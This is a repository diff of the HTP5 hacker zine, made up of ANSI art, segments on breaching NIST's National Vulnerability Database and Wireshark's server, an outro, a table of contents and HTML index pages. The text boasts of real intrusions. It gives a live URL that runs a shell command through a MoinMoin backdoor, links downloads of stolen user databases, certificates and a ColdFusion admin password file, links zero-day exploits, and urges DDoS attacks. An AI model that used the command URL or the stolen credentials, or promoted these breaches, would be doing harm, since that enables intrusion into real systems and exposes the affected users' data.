▒▓▓▓▓▓░▒▒▓▓▓▓▓▓▒░ ░▒▒▒▒▒▒▒░░▒▒▒▒▓▓▒▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▒▒▒░
▒▒▓▓▓▓▄▓▓▓░░▒▒▒▒░ ░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒░▒░
▒▒▒▓▓▓▒▒▓▒▒░░▒▒▒░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒▒░
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▓░
▒▒▒▒▒▒▒░░░░▒▒░░░ ░░░░░▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ ▒
▒▒▒░░░░░░░░▒░░░░ ░░ ░░▒▒▓▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒
▒░░░░░░░░░▒▒▒▒▒░░▒▒▓▓▓▓▓▓░░░░▒▒░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓
▒▒░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒░░░░▒▒▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒
▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▒▓▒▒▒▒▒▒▒▒▓▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▒
▒▒▒▒▒▒░░▒▒▓▓▓▓▒▒▒░░░░░▒▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█████▓▓▒
▒▒▒▒▒▒▒▓▓▓▒▒▓▓▒▒▒░░░░░░▒▒▓▓▓▒▒▒▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒███████▓▓▒▒
▓▓▓▓▓▓▓▓▓▓▓▓▓▒░ ░░▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓░░▓█████████▓▓▓▒
▓▓▓▓▓▓▓▓▒▓▓▒▒░ ░░░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒██████████████
▓▓▓▓▒▒▒▒▒▒▒░░░ ░░▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▒ ▓██████████████
▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓░ ░▓██████████████
▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░ ▓▓██████████████
▓▓▓▓▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓█▓▓▓▓▓▓░ ▒▓███████████████
▓▓▓█▓▓▓▒▒▒▒░░░░░░░░▒▒▓▓▓▓▓█▓▓▓▓▒░ ░▓▓███████████████
▓▓▓███████▓▓▓▓▓▓▓▒▓▓▒▓▓▓▓▓▓██▓▓▓▓▒ ░▓▓████████████████
▓▓████████████▒▒▓▓▓▓▓▓▓▓▓▓████▓▓▓▒░ ▓▓█████████████████
▓▓▓███████████████▓ ░▒▓▓▓██████▓▓▓▒ ▓▓██████████████████
▓▓▓████████████████████▒ ░▒▓▓▓██▓▒ ▓▓███████████████████
▓▓▓███████████████████████▓░ ░▓▒ ▒▓▓███████████████████
▓▓▓▓███████████████████████████▒ ▓▓▓ ▒▓█████████████████████
▓██████████████████████████████▓░ ▓▓▓▓▒ ░▓▓█████████████████████
███████████████████████████████▓░ ▓▓▓▓▓░▓░ ▓▓▓█████████████████████
███████████████████████████████▓ ░▓▓▒▒▓▒▓▓▒ ▓▓▓██████████████████████
███████████████████████████████░ ▒▓▒▒░▓▓▓░ ▒▓▓███████████████████████
███████████████████████████████▒ ▓▓▒░░▓▓░ ░▓▓████████████████████████
███████████████████████████████▒ ░▒▒▒▓▓▓▓▒ ░▓▓█████████████████████████
██████████████████████████████▓▓ ░▒▓▒▓▓▓▒▒▒ ▓▓██████████████████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀

95
htp/HTP5/0x05_NVD.txt Executable file
View File

@ -0,0 +1,95 @@
▄▄ ▄▄ ▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄ ▄ ▄▄▄
███▄ ██ █ █▄▄▄ █ ▄▄▄ ███▄ ██ █ █ █ █ HTP5
██ ▀█▄██ █ ▄▄▄█ █ ██ ▀█▄██ ▀▄▀ █▄▄▀
██ ▀██ ██ ▀██
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
GILL
However, we have come to believe that one 'HTP'
is involved in the NVD breach. They or perhaps
an accomplice of theirs have a disk that Mr.
Belford needs. We want you to help us find it.
\
░░▒▒▓▓▓▓▓▓▓▓▓▒▒░░
░▒▓███████████████████▓▒░
░▒▓█████████████████████████▓▒░
░▓████████▓▓▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓█████▓
░▓█████▓▓▓▓▒▒▒░░░░░░░░░░▒▒▒▒▒▓▓▓███▓
░▓████▓▓▓▒▒▒▒▒▒▒░░░░ ░░░░░▒▒▓▓▓██▓
▓████▓▓▒▒▒▒▒▒░░░░ ░░▒▒▒▓▓▓██▒
▒████▓▓▓▒▒▒▒▒░░░ ░▒▒▒▓▓▓██
▓████▓▓▒▒▒▒▒▒░░░ ░░▒▒▒▓▓▓█░
█████▓▓▒▒▒▒▒░░░ ░░▒▒▒▓▓█▒
████▓▓▒▒▒▒▒▒▒▒▒░░ ░░▒▒▒▒▓▓▓▓
███▓▓▒▒▒▒▒▒▒░░░ ░░░░▒▒▒▓▓▓▓
▓█▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▄░ ░▄▓▓▓▓▓▓▓▓▓█▓▓▓
▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▓█▒▓▒▓▒▓▓▓▓▓▓▓▓▓▓█▓█░
▒▓▓▓▓▒▒░░▒█▓▓▓▓▓▓▓▓▓▓█░▒░░▒▓▓▓▓▓▓▓▓▓▓▓█▓▓
░▒▓▓▒▒▒▒░░▒▒█▓▓▓▓▓▓▓▓▓█░▒░░░▒▓▓▓▓▓▓▓▓▓▓█▒▓░
▒▒▒▒▒▒▒▒▒▒▒░░▀▀▀▀▀▀▀ ░▒░░ ░▒▒▒▀▀▀▀▀▀▒▓▓▓▒
░▒▒▒▒▒▒▒▒▒░░ ░░░ ░░▒ ░░▒▒▒▓
▒▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░░░░ ░░▒▓▒
░▒▒▒▒▒▒▒▒▒░ ░░░░░ ░▒░░░ ░▒▒▓
░▒▒▒▒▒▒▒▒░░░░ ░░░░▒▒▒▒░░░░░▓▓▒░░ ░░░▒▓▓
░░▒▒▒▒▒▒░░░░░░▒▒▓▒░░░░░░░░░░░▒▓▓▓▒░░▒▒▓▓▓░
░▓▒▒▒▒▒░░░░░░░▒▓▓▒░░░ ░░▒▓▓▓▓▒▒▒▓▒▓░
▓▓▓▒▒▒▒░░░░░░▒▓▒░░ ░░░░ ░░░░░▒▒▓▓▒▒▒▒▒▓
▓▓▓▓▒▒▒░░░▒▒▒▒░ ░░▒▒▓▒▒▒▒▒░░▒▒▒▒▓▒▒▒▒▓▒
▓▓▓▓▓▒▒▒▒▒▒▒▓▒ ░░░░░░░░ ░▒▒▒░░▒▓▒▒▓▓
▒▓▓▓▓▓▒▒▒▒▒▒▓▒░░░░ ░░░░░░░▒▒▒▒▓▓▒▓▓▒
░░▒▒▓▓▓▓▒▒▒▒▒▒▓▒░░░ ░░▒▒▓▓▓▓▓▓▓
░ ▒▒▓▓▓▓▒▒▒▒▒▓▓▒▒░░░ ░░▒▒▒▒▓▓▓▓▒▓
░▒ ░▒▒▓▓▓▓▒▒▒▒▓▓▒▒▒░ ░▒▒▒▓▓▒▓█▓▒ ░░
░██░ ░▒▒▓▓▓▓▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▒▓▓▓▓▒ ░
▒████░ ░▒▒▓▓▓▒▒▓▓▓███████▓▓▓▓▓▓▓▓▒ ▓▒░
▒▓██████▒ ░▒▒▓▓▓▓▓▓▓█▓▓▓██▓▓▓▓▓▒▒▒ ▓███▓▓▒▒░░
░▒▓██████████▓ ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒ ░██████████▓▓▓▒▒░░
░▒▓███████████████▓ ░░░░▒▒▒▒▒▒▒▒░░▒░ ▒█████████████████▓▓▒
░▒▓▓████████████████████▓░ ▓▓▓▓░▓▓▓░░░ ████████████████████
██████████████████████████▓░ ▓▓▓▓▓▓░ ▒███████████████████
████████████████████████████▒ ▓▓██ ▓██████████████████
█████████████████████████████▒ ████ ░██████████████████
██████████████████████████████▒ ▀████ ▒█████████████████
███████████████████████████████▓ █████ █████████████████
████████████████████████████████▓ ██████ ▒████████████████
█████████████████████████████████▓ ███████ ▓███████████████
██████████████████████████████████▓░ ████████ ░▓██████████████
████████████████████████████████████░ ▓████████ ▒██████████████
█████████████████████████████████████░ █████████ ██████████████
██████████████████████████████████████▒ █████████ ▓█████████████
███████████████████████████████████████▒ ██████████ ░█████████████
████████████████████████████████████████▓ ▒██████████ ▓████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
About 8 months ago, we were monitoring our intel (tail -f'ing PM logs from other
networks) and came across an individual who was pretty skilled with ColdFusion.
After due time, we invited him/her to HTP. He/she ended up manifesting the NULL
RDS 1day POC, which owned the NVD.
The NVD realized they were breached, and deleted the shells. Soon after, they
were shelled again. They deleted the shells again. Once again, they were
shelled. The DHS CSD was swift and unrelenting with their execution of the
DELETE key.
As fun as this was, the rest of HTP acknowledged what had been breached. We
switched tactics and proceeded to traverse the National Vulnerability Database
network. Two boxes down, we downloaded the CFM scripts and certificates hosted
within the NVD and NISTWEB servers. From them, we were able to authenticate
ourselves to access the DHS NIST/NVD user database (root slash period workspace
slash period garbage period).
Not knowing what to do, and realizing their DELETE key training had abandoned
them, the DHS CSD resorted to shutting the entire site down. It is our theory
their inspiration for this technique came from an NCIS episode:
http://www.youtube.com/watch?v=u8qgehH3kEQ
Included in this segment of HTP5 is the DHS NIST/NVD user database, along with
two certificates and their ColdFusion admin password.properties. Enjoy.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/NVD/NVD.zip
|- 0MB | DHS NIST/NVD user database, two certs, CF admin password.properties
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

69
htp/HTP5/0x06_Wireshark.txt Executable file
View File

@ -0,0 +1,69 @@
███ ███ ▄████ ▄▄████▄▄ ███ ███
███ ███ ▄█████ ▄██▀ ▀██▄ ███ ███
███ ███ ▄██▀███ ███ ███ ███ ███
██████████ ▄██▀ ███ ███ ███▄███ W
███ ███ ▄██▀ ███ ███ ████████ I
███ ███ ▄██▀ ███ ███ ███ ███ ████ R
███ ███ ▄██████████ ▀██▄ ▄██▀ ███ ████ E
███ ███ ▄██▀ ███ ▀▀████▀▀ ███ ████ S
H
A
_____ R
███████████ ███ ███ ██████████ ,-:` \;',`'- K
███ ███ ███ ███ .'-;_,; ':-;_,'.
███ ███ ███ ███ /; '/ , _`.-\
███ ██████████ ███████ | '`. (` /` ` \`|
███ ███ ███ ███ |:. `\`-. \_ / |
███ ███ ███ ███ | ( `, .`\ ;'|
███ ███ ███ ███ \ | .' `-'/
███ ███ ███ ██████████ `. ;/ .'
`'-._____.-'`
███████▄▄ ███ ▄████ ███▄ ███ ██████████ ███████████ /""-._
███ ▀██▄ ███ ▄█████ ████▄ ███ ███ ███ . '-,
███ ███ ███ ▄██▀███ █████▄ ███ ███ ███ : '',
███ ▄██▀ ███ ▄██▀ ███ ███▀██▄ ███ ███████ ███ ; * '.
███████▀▀ ███ ▄██▀ ███ ███ ▀██▄███ ███ ███ ' * () '.
███ ███ ▄██▀ ███ ███ ▀█████ ███ ███ \ \
███ ███ ▄██████████ ███ ▀████ ███ ███ \ _.---.._ '.
███ ████████ ▄██▀ ███ ███ ▀███ ██████████ ███ : .' _.--''-'' \ ,'
.._ '/.' . ;
; `-. , \'
; `, ; ._\
; \ _,-' ''--._
: \_,-' '-._
\ ,-' . '-._
.' __.-''; \...,__ '.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 0x06 ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄.' _,-' \ \ ''--.,__ '\
/ _,--' ; \ ; "^.}
For the final segment of HTP5, we present: Wireshark. ;_,-' ) \ )\ ) ;
/ \/ \_.,-' ;
Debian, Python, Wireshark, Mercurial, MoinMoin, and Wget / ;
were all compromised by moinmelt.py, our RXE 0day for ,-' _,-'''-. ,-., ;
MoinMoin (included in HTP5). Hell, Wget is still ,-' _.-' \ / |/'-._...--'
shelled. Would someone please update them? It's been :--`` )/
months by now:
http://wget.addictivecode.org/Wget?action=moinexec&c=uname%20-a
We had our sights set on backdooring Mercurial, which
would land us shells on UnrealIRCd (3rd time!), Firefox,
QuakeNet, Pidgin, and Debian repositories. However, we
were more interested in having fun, so instead we dropped
into Wireshark's server.
After 24 hours, Wireshark's server 'splash' returned a shell.
It featured a 3.7 kernel and an Apache httpd, which hosted
both the blog and the wiki. Permissions were read-world on
the config files, and we couldn't help ourselves. We then
proceeded to monitor Wireshark's www-data mail, as well as
download their user databases. All of the above is included
in the concluding segment of HTP5. Enjoy your corporate
security access.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Wireshark/wireshark.zip
|- 1.3MB | 31MB compressed Wireshark data
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

51
htp/HTP5/0x07_Outro.txt Executable file
View File

@ -0,0 +1,51 @@
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄
█ █ ▄ ▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ HTP5
█ █ █ █ █ █▄▄█ █ █
█▄▄▄█ █▄▄█ █ █ ▀▄ █▄▄█
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
We've come a long way since we first showed up on the Scene. Current and past
crew of Hack The Planet, we appreciate your kickass effort that got us to this
point. Since our inception, we have unfortunately witnessed a few of our crew
members getting arrested. To them, we regret what has transpired, and wish you
all the best beyond HTP.
This zine, like all of the others, has been a blast to create. Those interested
can check out http://straylig.ht/ for past releases.
Here's to two years of HTP, everyone. Remember; relax, have fun, be the best,
and DDoS Anonymous on sight.
Hack the Planet!
Shout Outs To:
> ACiD (colored ANSI)
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
|▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
|▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
\ |▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
\ ▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
,-'`▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
,` ▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ / ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒--▒▒░-- ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF

1057
htp/HTP5/HTP5.txt Executable file
View File

File diff suppressed because it is too large Load Diff

18
htp/HTP5/TOC.txt Executable file
View File

@ -0,0 +1,18 @@
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄
██████▄▄█▓▓██████████████████▓▓▓██▓▄▄███ > Intro █ █
█████████▓▓██████████████████▓▓▓██▓███▓█ > MIT/EDU ▀▀▀█ █▀▀
███▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▓█ > Linode █ █
█▓█ ███▀▀▀▀▀███▀██▀▀█▀▀██▀██▀▀▀▀▀███ █▓█ > Nmap █ █▄▄▄▄▄▄▄▄▄
███ ██ ▄▀ ▀▄ ██ █▓▓ ███ █ ▄▀ ▀▄ ▓▓ █▓█ > Sucuri ▀▀▀▀█ █
█▓█ ▓▓ ▀▄ ▄▀ ██ █▓▓ ███ █ ▀▄ ▄▀ ██ █▓█ > NIST NVD █ █▀█ █
█▓█ ███▄▄▄▄▄███▄██▄▄█▄▄██▄██▄▄▄▄▄███ ███ > Wireshark █ █▄█ █
█▓█ ________________________________ █▓█ > Art █ █▄▄▄▄▄▄
█▓█ HTP____________________MWTB_DLTR ███ > Zerodays ▀▀▀▀▀▀▀█ █
██████▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀██████ > Outro █ █▀▀▀▀
█▓▓██ █▀▀████████████████████▀▀█ ██▓▓█ > See reverse for █ █▄▄▄▄
████ ████████████████████▓▓██████ ████ > HTP4 █ █
▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

81
htp/HTP5/index.html Executable file
View File

@ -0,0 +1,81 @@
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
<title>Hack The Planet - IN COMMONLY USED PASSWORDS WE TRUST</title>
<link href="../../style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<!--<h1>Hack The Planet</h1>-->
<div name ="header">
<pre>
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
/████████ /████████ /██████████████████ /███████████████▄
|▒████████ |████████ |▒██████████████████ |▒█████████████████
|▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
|▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
|▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
|▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
|▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
|▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
|/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
IN COMMONLY USED PASSWORDS WE TRUST
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
</pre>
</div>
<ul>
<li><a href="TOC.txt" class="zine">TOC</a></li>
<li><a href="0x00_Intro.txt" class="zine">Intro</a></li>
<li><a href="0x01_MIT-EDUCAUSE.txt" class="zine">MIT/EDUCAUSE</a> Files: <a href="../../files/educause.zip" class="zine">EDUCAUSE data</a></li>
<li><a href="0x02_Linode.txt" class="zine">Linode</a> Files: <a href="../../files/registrardata.txt" class="zine">registrardata.txt</a>, Screenshots <a href="../../files/ss1.png" class="zine">one</a> and <a href="../../files/ss2.png" class="zine">two</a></li>
<li><a href="0x03_Nmap.txt" class="zine">Nmap</a> Files: <a href="../..//files/nmap_dmca_lolg.txt" class="zine">Fyodor response</a> and <a href="../../files/krashed_and_fyodor.png" class="zine">Fyodor's last resort</a></li>
<li><a href="0x04_Sucuri.txt" class="zine">Sucuri</a> Files: <a href="../../files/dbs.tgz" class="zine">dbs.tgz</a></li>
<li><a href="0x05_NVD.txt" class="zine">NIST/NVD</a> Files: <a href="../../files/NVD.zip" class="zine">NVD.zip</a></li>
<li><a href="0x06_Wireshark.txt" class="zine">Wireshark</a> Files: <a href="../../files/wireshark.zip" class="zine">wireshark.zip</a></li>
<li>Art: <a href="../../files/art/htp5ansi.png " class="zine">ANSI</a>, <a href="../../files/art/htp.png" class="zine">graffiti</a>, and <a href="../../files/art/htp_wallpaper.jpg " class="zine">wallpaper</a></li>
<li>Zerodays: <a href="../../files/moinmelt.txt" class="zine">MoinMelt</a>, <a href="../../files/subzero.txt" class="zine">SubZero v2</a></li>
<li><a href="0x07_Outro.txt" class="zine">Outro</a></li>
<li><a href="HTP5.txt" class="zine"> HTP5 - Full text version</a></li>
</ul>
<br><br><br><br>
<!--<img src="blinking_cursor.gif">-->
<div name ="footer">
<pre>
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF
</pre>
</div>
</body>
</html>

80
htp/HTP5/index.html.old Executable file
View File

@ -0,0 +1,80 @@
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
<title>Hack The Planet - IN COMMONLY USED PASSWORDS WE TRUST</title>
<link href="../../style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<!--<h1>Hack The Planet</h1>-->
<div name ="header">
<pre>
